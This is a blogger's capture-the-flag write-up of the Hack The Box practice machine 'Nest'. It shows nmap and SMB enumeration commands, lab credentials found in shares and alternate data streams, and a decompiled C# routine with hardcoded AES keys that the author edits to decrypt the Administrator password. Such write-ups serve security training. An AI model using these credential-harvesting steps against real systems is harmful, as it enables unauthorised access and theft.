7th August 2020
Hack The Box Write Up Nest by T13nn3s

Hack The Box Write-Up Nest – 10.10.10.178

Look up at the stars and not down at your feet

Stephen Hawking

About Nest

In this post, I’m writing a write-up for the machine Forest from Hack The Box. Hack The Box is an online platform allowing you to test and advance your skills in cybersecurity.

This box shows the concepts of enumeration. This box relies heavily on enumeration and basic knowledge of VB.NET scripting language. It is a CTF-like box and one big puzzle that you have to put back together after each step to be able to go to the next step. I really enjoyed this box, even though I was misled a few times by the files I found and misinterpreted. This box is one of the nicest boxes I did at Hack The Box, I have really enjoyed it.

Foothold
The Nmap port scan reveals to open ports, the 445/tcp for SMB and 4386/tcp. The last port is for an unknown service, I found that the HQK Reporting Service V1.2 is running in this port. It reachable through Telnet. I found some files but I was not able to open it. The DEBUG command needs a password, which I do not have (yet). Through the enumeration of SMB with Guest, I found the credentials for the TempUser in an alternative data stream from a TXT-file. I have now gained the foothold on this machine.

User
Because the user TempUser has more permission to access files and I found with this user a Visual Basic Script which needs to be decompiled. After decompiling, the code reveals that it hold a decrypted string. After doing some modification to this file for decryption of the string I found the password for the user account c.smith.

Root
The user c.smith holds interesting information on his home drive for HQK Reporting Service V1.2. With Powershell, I revealed an alternative data stream from the file ‘Debug Mode Password.txt’. This stream contains the DEBUG password for the HQK service. Through the DEBUG console, I discovered the HqkLdap.exe file. After decompiling this program with DotPeek. This program holds an encrypted password. After adding an oneliner to this script which I calling the decryption function, I get the Administrator password. With this password, I was able to get the root flag through making an SMB connection with the Administrator-account.

Machine Info

Machine Info
Machine IP and creator

Recon

Portscan

As always first the portscan with Nmap. I have added the -p- parameter to the scan, otherwise, the high port will not be detected.

~$ nmap -p- -sC -sV -oA ./nmap/nest.txt 10.10.10.178

The results of the portscan.

Nmap scan report for 10.10.10.178                                                                                                             
Host is up (0.15s latency).                                                                                                                   
Not shown: 65533 filtered ports                                                                                                               
PORT     STATE SERVICE       VERSION                                                                                                          
445/tcp  open  microsoft-ds?                                                                                                                  
4386/tcp open  unknown                                                                                                                        
| fingerprint-strings:                                                                                                                        
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSes
sionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:                                                                       
|     Reporting Service V1.2                                                                                                                  
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions:                                                        
|     Reporting Service V1.2                                                                                                                  
|     Unrecognised command                                                                                                                    
|   Help:                                                                                                                                     
|     Reporting Service V1.2                                                                                                                  
|     This service allows users to run queries against databases using the legacy HQK format                                                  
|     AVAILABLE COMMANDS ---                                                                                                                  
|     LIST                                                                                                                                    
|     SETDIR <Directory_Name>                                                                                                                 
|     RUNQUERY <Query_ID>                                                                                                                     
|     DEBUG <Password>                                                                                                                        
|_    HELP <Command>                                                                                                                          
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cg
i-bin/submit.cgi?new-service :
SF-Port4386-TCP:V=7.80%I=7%D=1/27%Time=5E2F5538%P=x86_64-pc-linux-gnu%r(NU
SF:LL,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLin
SF:es,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognise
SF:d\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x2
SF:0V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r\
SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comma
SF:nd\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\
SF:n\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Repo
SF:rting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQK
SF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21,"
SF:\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQK\
SF:x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allows\
SF:x20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20th
SF:e\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20---
SF:\r\n\r\nLIST\r\nSETDIR\x20<Directory_Name>\r\nRUNQUERY\x20<Query_ID>\r\
SF:nDEBUG\x20<Password>\r\nHELP\x20<Command>\r\n>")%r(SSLSessionReq,21,"\r
SF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServerCooki
SF:e,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSessionR
SF:eq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerberos,2
SF:1,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNeg,21,
SF:"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21,"\r\
SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourRequest,3A
SF:,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20
SF:command\r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2
SF:\r\n\r\n>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.
SF:2\r\n\r\n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2
SF:\r\n\r\n>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r
SF:\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK\x20R
SF:eporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nHQK\x2
SF:0Reporting\x20Service\x20V1\.2\r\n\r\n>");


Host script results:
|_clock-skew: -58m52s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-01-27T20:29:00
|_  start_date: 2020-01-27T19:50:09 

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 789.14 seconds

After the portscan I get the result that there are two open ports:

  • 445/tcp (SMB)
  • 4386/tcp (unknown)

Enumeration with Telnet

The port 4386 is an unknown port and not default bound to a program or service. Nmap returns some useful information: It shows that I can run some commands.

...
Help:                                                                                                                                     
|     Reporting Service V1.2                                                                                                                  
|     This service allows users to run queries against databases using the legacy HQK format                                                  
|     AVAILABLE COMMANDS ---                                                                                                                  
|     LIST                                                                                                                                    
|     SETDIR <Directory_Name>                                                                                                                 
|     RUNQUERY <Query_ID>                                                                                                                     
|     DEBUG <Password>                                                                                                                        
|_    HELP <Command>  
...

I have started by trying to search through the web browser http://10.10.10.178:4386, the website keeps loading fo a little time, but I’m patient, and the webserver is returning the following:

http://10.10.10.178:4386

The service is expecting a command. I first tried to create a session with netcat to the server. A shell comes up, but cannot use any of the commands. Then I tried with Telnet.

~$ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>

Now I’m getting somewhere. The LIST command shows that I’m currently in the hqk directory. With the SETDIR commando’s I can change the directory. With SETDIR ../ I can go a level up, and I’ve searched through all of the directories and some useful files but I can’t open any of the files. The HELP command shows that I can use a DEBUG command, but this command needs a password.

>help debug

DEBUG <Password>
Enables debug mode, which allows the use of additional commands to use for troubleshooting network and configuration issues. Requires a password which will be set by your system administrator when the service was installed

Examples: 
DEBUG MyPassw0rd     Attempts to enable debug mode by using the
                     password "MyPassw0rd"

Let’s poke some around. After running around on the server I found some interesting directories in C:\Shared but again, none of the files can’t be opened or being downloaded. Let’s try the lower port for further enumeration.

Enumerate SMB

I don’t have any user credentials yet. Sometimes it is possible to gain access as an anonymous user. For this step I use smbmap. I invoked this command below:

~$ smbmap -u Guest -H 10.10.10.178
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.178...
[+] IP: 10.10.10.178:445        Name: 10.10.10.178                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        .                                                  
        dr--r--r--                0 Tue Jan 28 10:38:36 2020    .
        dr--r--r--                0 Tue Jan 28 10:38:36 2020    ..
        dr--r--r--                0 Thu Aug  8 00:58:07 2019    IT
        dr--r--r--                0 Mon Aug  5 23:53:41 2019    Production
        dr--r--r--                0 Mon Aug  5 23:53:50 2019    Reports
        dr--r--r--                0 Wed Aug  7 21:07:51 2019    Shared
        Data                                                    READ ONLY
        IPC$                                                    NO ACCESS       Remote IPC
        Secure$                                                 NO ACCESS
        .                                                  
        dr--r--r--                0 Tue Jan 28 10:38:41 2020    .
        dr--r--r--                0 Tue Jan 28 10:38:41 2020    ..
        dr--r--r--                0 Fri Aug  9 17:08:23 2019    Administrator
        dr--r--r--                0 Sun Jan 26 08:21:44 2020    C.Smith
        dr--r--r--                0 Thu Aug  8 19:03:29 2019    L.Frost
        dr--r--r--                0 Thu Aug  8 19:02:56 2019    R.Thompson
        dr--r--r--                0 Thu Aug  8 00:56:02 2019    TempUser
        Users                                                   READ ONLY

First tried the smbclient //10.10.10.178/Users. I’m entering a random password. But I do not have access to open any folder.

~$ smbclient //10.10.10.178/Users
~$ Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> ls
  .                                   D        0  Tue Jan 28 10:38:41 2020
  ..                                  D        0  Tue Jan 28 10:38:41 2020
  Administrator                       D        0  Fri Aug  9 17:08:23 2019
  C.Smith                             D        0  Sun Jan 26 08:21:44 2020
  L.Frost                             D        0  Thu Aug  8 19:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 19:02:50 2019
  TempUser                            D        0  Thu Aug  8 00:55:56 2019

\Administrator
NT_STATUS_ACCESS_DENIED listing \Administrator\*

\C.Smith
NT_STATUS_ACCESS_DENIED listing \C.Smith\*

\L.Frost
NT_STATUS_ACCESS_DENIED listing \L.Frost\*

\R.Thompson
NT_STATUS_ACCESS_DENIED listing \R.Thompson\*

\TempUser
NT_STATUS_ACCESS_DENIED listing \TempUser\*
smb: \> 

With the command smbclient //10.10.10.178/Data I got a bite. I have access to the Shared folder. The file ‘Welcome Email.txt’ in location \Shared\Templates\HR contains interesting information. I downloaded this file, with the use of the ‘mget’ command, to my machine and read the contents of this file.

cat 'Welcome Email.txt'
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location: 
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the 
IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019


Thank you

Cool! Now I got some credentials! The file says that we can make a network connection to a share.

Intrusion

TempUser

I created an SMB connection with this command

~$ smbclient //10.10.10.178/Users/ -U TempUser -W HTB-NEST
~$ Enter HTB-NEST\TempUser's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jan 26 00:04:21 2020
  ..                                  D        0  Sun Jan 26 00:04:21 2020
  Administrator                       D        0  Fri Aug  9 17:08:23 2019
  C.Smith                             D        0  Sun Jan 26 08:21:44 2020
  L.Frost                             D        0  Thu Aug  8 19:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 19:02:50 2019
  TempUser                            D        0  Thu Aug  8 00:55:56 2019

                10485247 blocks of size 4096. 6449705 blocks available
smb: \> cd TempUser\
smb: \TempUser\> ls
  .                                   D        0  Thu Aug  8 00:55:56 2019
  ..                                  D        0  Thu Aug  8 00:55:56 2019
  New Text Document.txt               A        0  Thu Aug  8 00:55:56 2019

                10485247 blocks of size 4096. 6449705 blocks available
smb: \TempUser\> 

There is a file ‘New Text Document.tx’t. When I open this file… I find this file is empty. All that work for an empty file?! Although, maybe this file isn’t as empty as it seems. I want to get all the information from this file. I’ll do this with the allinfo.

smb: \TempUser\> allinfo "New Text Document.txt" 
altname: NEWTEX~1.TXT
create_time:    Thu Aug  8 12:55:56 AM 2019 CEST
access_time:    Thu Aug  8 12:55:56 AM 2019 CEST
write_time:     Thu Aug  8 12:55:56 AM 2019 CEST
change_time:    Thu Aug  8 12:56:02 AM 2019 CEST
attributes: A (20)
stream: [::$DATA], 0 bytes

Yep, this file is as empty as it is. There’s also no alternative data stream in it. I’ve got the user credentials TempUser:welcome2019. I created a connection with this user.

~$ smbclient //10.10.10.178/Data/ --user TempUser -W NEST-HTB

I downloaded all the files from the \IT\Configs directory. The other folders are empty. I investigated the files. In the file RU_config.xml I found an encrypted password of the user c.smith.

<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>

I placed the password in the ‘hash.txt’ file and decoded it as base64 and try to run john against it. The decrypted password seems to be a complex password, but, this password isn’t working on SMB. Then I looked into the config.xml file, and this part of the script is very interesting:

...
<Find name="192" />
        <Replace name="C_addEvent" />
    </FindHistory>
    <History nbMaxFile="15" inSubMenu="no" customLength="-1">
        <File filename="C:\windows\System32\drivers\etc\hosts" />
        <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
    </History>
...

I have no access to the location //10.10.10.178/Secure$ with smbclient, it leaves me with an error denied message. It took me some hours to find out the next step. I found out that I can browse in this location, the cd command isn’t prohibited. I invoked this command:

~$ smbclient //10.10.10.178/Secure$ --user TempUser -W NEST-HTB                                                               
Enter NEST-HTB\TempUser's password:                                                                                                                                            
Try "help" to get a list of possible commands.                                                                                                                                 
smb: \> cd IT\                                                                                                                                                                 
smb: \IT\> ls                                                                                                                                                                  
NT_STATUS_ACCESS_DENIED listing \IT\*                                                                                                                                          
smb: \IT\> cd Carl                                                                                                                                                             
smb: \IT\Carl\> ls                                                                                                                                                             
  .                                   D        0  Wed Aug  7 21:42:14 2019                                                                                                     
  ..                                  D        0  Wed Aug  7 21:42:14 2019                                                                                                     
  Docs                                D        0  Wed Aug  7 21:44:00 2019                                                                                                     
  Reports                             D        0  Tue Aug  6 15:45:40 2019                                                                                                     
  VB Projects                         D        0  Tue Aug  6 16:41:55 2019

I walked through all the files and directories and downloaded the files to my machine for further investigation.

Compile Visual Basic Project (Visual Studio)

I put all the files together and it seems that I have downloaded a Visual Basic project with the name RU Scanner. The project file I placed in C:\%path%\VB Projects\WIP\RU\RUScanner.sln. From this moment I switched to my Windows machine. On this machine, I’ve got Visual Studio 16.4.3 already installed. I opened the file RUScanner.sln.

ConfigFile.vb

Let’s start from the beginning. I build this project by right-clicking in ‘RU Scanner’ in the Solution Explorer and then click ‘Build’. On C:\%PATH%\VB Projects\WIP\RU\RUScanner\bin\Debug there is now a file located, with the name DbProf.exe. When I run this file there are some errors visible.

Errors while running DbProf.exe

According to tot the first error, I placed config.xml in the ‘Debug’ folder and called DbProf.exe. Result: an empty line. Ok, the errors are gone, but no decrypted password.

The script needs some modification. When I read this script carefully there is an encryption and decryption section in the Utils.vb file. When I run the DBProf.exe the Module1 will be called and executed. This module is placed in the file Module1.vb. As this module contains no entries for decrypting the password, there is nothing happen. To get the decryption done, I need to pass the encrypted hash to this module and read the decrypted password. So, I ended up with two lines of code to get the decryption to do his thing:

I added these two lines of code:

Console.WriteLine(Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE="))
        Console.ReadLine()

The file ‘Module1.vb’ after the modification:

Module Module1

    Sub Main()
        Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
        Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)}

        Console.WriteLine(Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE="))
        Console.ReadLine()



    End Sub

End Module
Adding two lines of code

Now, I can call this file again from the Command Line:

And the password for the user c.smith is now decrypted. The password is xRxRxPANCAK3SxRxRx.

Switch to user c.smith

With the password of the user c.smith I can create an SMB session. I invoked this command:

~$ smbclient //10.10.10.178/Users --user c.smith -W NEST-HTB

Go to the user.txt and download this file to my machine.

smb: \> cd C.smith
smb: \C.smith\> mget user.txt

By opening this file I can read the user flag.

~$ cat user.txt 
cf71b25404be5d84fd827e05f426e987

Privilege escalation to root

Enumeration SMB

I can now do more enumeration with the user c.smith. There are interesting files on his home drive \C.Smith\HQK Reporting. I downloaded the files to my machine.

smb: \C.Smith\HQK Reporting\AD Integration Module\> ls
  .                                   D        0  Fri Aug  9 14:18:42 2019
  ..                                  D        0  Fri Aug  9 14:18:42 2019
  HqkLdap.exe                         A    17408  Thu Aug  8 01:41:16 2019

                10485247 blocks of size 4096. 6449680 blocks available
smb: \C.Smith\HQK Reporting\AD Integration Module\> mget *
Get file HqkLdap.exe? yes
getting file \C.Smith\HQK Reporting\AD Integration Module\HqkLdap.exe of size 17408 as HqkLdap.exe (67.5 KiloBytes/sec) (average 67.5 KiloBytes/sec)
smb: \C.Smith\HQK Reporting\> ls
  .                                   D        0  Fri Aug  9 01:06:17 2019
  ..                                  D        0  Fri Aug  9 01:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 14:18:42 2019
  Debug Mode Password.txt             A        0  Fri Aug  9 01:08:17 2019
  HQK_Config_Backup.xml               A      249  Fri Aug  9 01:09:05 2019

                10485247 blocks of size 4096. 6449723 blocks available
smb: \C.Smith\HQK Reporting\> mget *
Get file Debug Mode Password.txt? yes
getting file \C.Smith\HQK Reporting\Debug Mode Password.txt of size 0 as Debug Mode Password.txt (0.0 KiloBytes/sec) (average 48.3 KiloBytes/sec)
Get file HQK_Config_Backup.xml? yes
getting file \C.Smith\HQK Reporting\HQK_Config_Backup.xml of size 249 as HQK_Config_Backup.xml (0.5 KiloBytes/sec) (average 21.5 KiloBytes/sec)
smb: \C.Smith\HQK Reporting\>

It seems that the file ‘Debug Mode Password.txt’ is empty. Another empty file… Let’s start with this file, there has to be some content in this file, since it was not easy to get so far in this challenge. And for this one, is switched (again?) to my Windows machine. (Sorry guys, I’m a Windows Engineer…).

Powershell is a Powerful tool in Windows. It can also be used to extract hidden data streams. From my Windows machine, I have created a Network Connection to the home folder of c.smith and invoked the commands below to get the contents of this file:

PS Z:\C.Smith> cd '.\HQK Reporting\'
PS Z:\C.Smith\HQK Reporting> ls


    Directory: Z:\C.Smith\HQK Reporting


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         9-8-2019     14:18                AD Integration Module
-a----         9-8-2019     01:08              0 Debug Mode Password.txt
-a----         9-8-2019     01:09            249 HQK_Config_Backup.xml


PS Z:\C.Smith\HQK Reporting> Get-Item '.\Debug Mode Password.txt' -stream *


PSPath        : Microsoft.PowerShell.Core\FileSystem::Z:\C.Smith\HQK Reporting\Debug Mode Password.txt::$DATA
PSParentPath  : Microsoft.PowerShell.Core\FileSystem::Z:\C.Smith\HQK Reporting
PSChildName   : Debug Mode Password.txt::$DATA
PSDrive       : Z
PSProvider    : Microsoft.PowerShell.Core\FileSystem
PSIsContainer : False
FileName      : Z:\C.Smith\HQK Reporting\Debug Mode Password.txt
Stream        : :$DATA
Length        : 0

PSPath        : Microsoft.PowerShell.Core\FileSystem::Z:\C.Smith\HQK Reporting\Debug Mode Password.txt:Password
PSParentPath  : Microsoft.PowerShell.Core\FileSystem::Z:\C.Smith\HQK Reporting
PSChildName   : Debug Mode Password.txt:Password
PSDrive       : Z
PSProvider    : Microsoft.PowerShell.Core\FileSystem
PSIsContainer : False
FileName      : Z:\C.Smith\HQK Reporting\Debug Mode .txt
Stream        : Password
Length        : 15



PS Z:\C.Smith\HQK Reporting> Get-Content '.\Debug Mode Password.txt' -stream Password
WBQ201953D8w
PS Z:\C.Smith\HQK Reporting>
Extract hidden data from ‘Debug Mode Password.txt’

I have got now the DEBUG password: WBQ201953D8w. I created a telnet session to 10.10.10.178 on port 4386 and enter the DEBUG mode by filling in the password.

~$ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>DEBUG WBQ201953D8w

I have now more commands at my disposal:

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>

I need to poke around and try to find something interesting. In the directory LDAP, there is a file named ldap.conf with the contents:

Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

Another encrypted password… I have copied the contents of this file to my machine. I need to put all of the pieces together starting with the file HqkLdap.exe. To know what this file is doing, I need to compile it.

Decompile HqkLdap.exe (dotPeek)

To decompile this program I use dotPeek from JetBrains. I have downloaded this program from their website: https://www.jetbrains.com/decompiler/. I loaded this program into the software. The code got compiled by the software to C# code. After reading through the code, the class CR is interesting because in this part the password gets decrypted. I got an encrypted password from the Administrator account which needs to be decrypted, sounds logical anyway.

Decompilation of HqkLdap.exe in JetBrains dotPeek

This part public static string DS(string EncryptedString) is calling for the encrypted string for decryption.

In my Visual Studio, I created a new CSharp project with the name ‘decrypt_admin.cs’ and copied the contents of the CR class to this project. I ended up editing this file and added some lines which are calling this DS function with the encrypted password as a string.

// HqkLdap.CR
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

public class CR
{
	private const string K = "667912";

	private const string I = "1L1SA61493DRV53Z";

	private const string SA = "1313Rf99";

	public static string DS(string EncryptedString)
	{
		if (string.IsNullOrEmpty(EncryptedString))
		{
			return string.Empty;
		}
		return RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256);
	}

	public static string ES(string PlainString)
	{
		if (string.IsNullOrEmpty(PlainString))
		{
			return string.Empty;
		}
		return RE(PlainString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256);
	}

	private static string RE(string plainText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize)
	{
		//Discarded unreachable code: IL_00b9
		byte[] bytes = Encoding.ASCII.GetBytes(initVector);
		byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue);
		byte[] bytes3 = Encoding.ASCII.GetBytes(plainText);
		Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations);
		byte[] bytes4 = rfc2898DeriveBytes.GetBytes(checked((int)Math.Round((double)keySize / 8.0)));
		AesCryptoServiceProvider aesCryptoServiceProvider = new AesCryptoServiceProvider();
		aesCryptoServiceProvider.Mode = CipherMode.CBC;
		ICryptoTransform transform = aesCryptoServiceProvider.CreateEncryptor(bytes4, bytes);
		using (MemoryStream memoryStream = new MemoryStream())
		{
			using (CryptoStream cryptoStream = new CryptoStream(memoryStream, transform, CryptoStreamMode.Write))
			{
				cryptoStream.Write(bytes3, 0, bytes3.Length);
				cryptoStream.FlushFinalBlock();
				byte[] inArray = memoryStream.ToArray();
				memoryStream.Close();
				cryptoStream.Close();
				return Convert.ToBase64String(inArray);
			}
		}
	}

	private static string RD(string cipherText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize)
	{
		byte[] bytes = Encoding.ASCII.GetBytes(initVector);
		byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue);
		byte[] array = Convert.FromBase64String(cipherText);
		Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations);
		checked
		{
			byte[] bytes3 = rfc2898DeriveBytes.GetBytes((int)Math.Round((double)keySize / 8.0));
			AesCryptoServiceProvider aesCryptoServiceProvider = new AesCryptoServiceProvider();
			aesCryptoServiceProvider.Mode = CipherMode.CBC;
			ICryptoTransform transform = aesCryptoServiceProvider.CreateDecryptor(bytes3, bytes);
			MemoryStream memoryStream = new MemoryStream(array);
			CryptoStream cryptoStream = new CryptoStream(memoryStream, transform, CryptoStreamMode.Read);
			byte[] array2 = new byte[array.Length + 1];
			int count = cryptoStream.Read(array2, 0, array2.Length);
			memoryStream.Close();
			cryptoStream.Close();
			return Encoding.ASCII.GetString(array2, 0, count);
		}
	}

	public static void Main(string[] args)
    {
		Console.WriteLine(DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="));
    }
}

Decrypt the Administrator password

The last thing that I have to do now is to run the code and get the password decrypted. I decrypted the password with Fiddle.NET ( https://dotnetfiddle.net/ ).

Root the box

I entered now the last part of this box. I created an SMB session with the Administrator account and browsed to the desktop of the Administrator account and I have the root.txt.

~# smbclient //10.10.10.178/C$ --user Administrator -W NEST-HTB
Enter NEST-HTB\Administrator's password:                                                                                                                                                                                                       
Try "help" to get a list of possible commands.                                                                                                                                 
smb: \> cd Users\Administrator\Desktop                                                                                                                                                                
smb: \Users\Administrator\Desktop\> mget root.txt                                                                                                                                                                  

Submit this flag and this box is owned! Did you like this write-up? Please consider spending a respect point, my HTB profile: https://www.hackthebox.eu/home/users/profile/224856, It means a lot to me, many thanks!

Happy hacking!

T13nn3s

I'm a cyber security enthusiast! I love my work, I love writing scripts and doing research and pen testing. Big fan of Hack The Box and I learn new things every day to make the internet safer. I blog because I love to summarize my thoughts and share them with you.

View all posts by T13nn3s →

Leave a Reply

Your email address will not be published. Required fields are marked *

%d bloggers like this: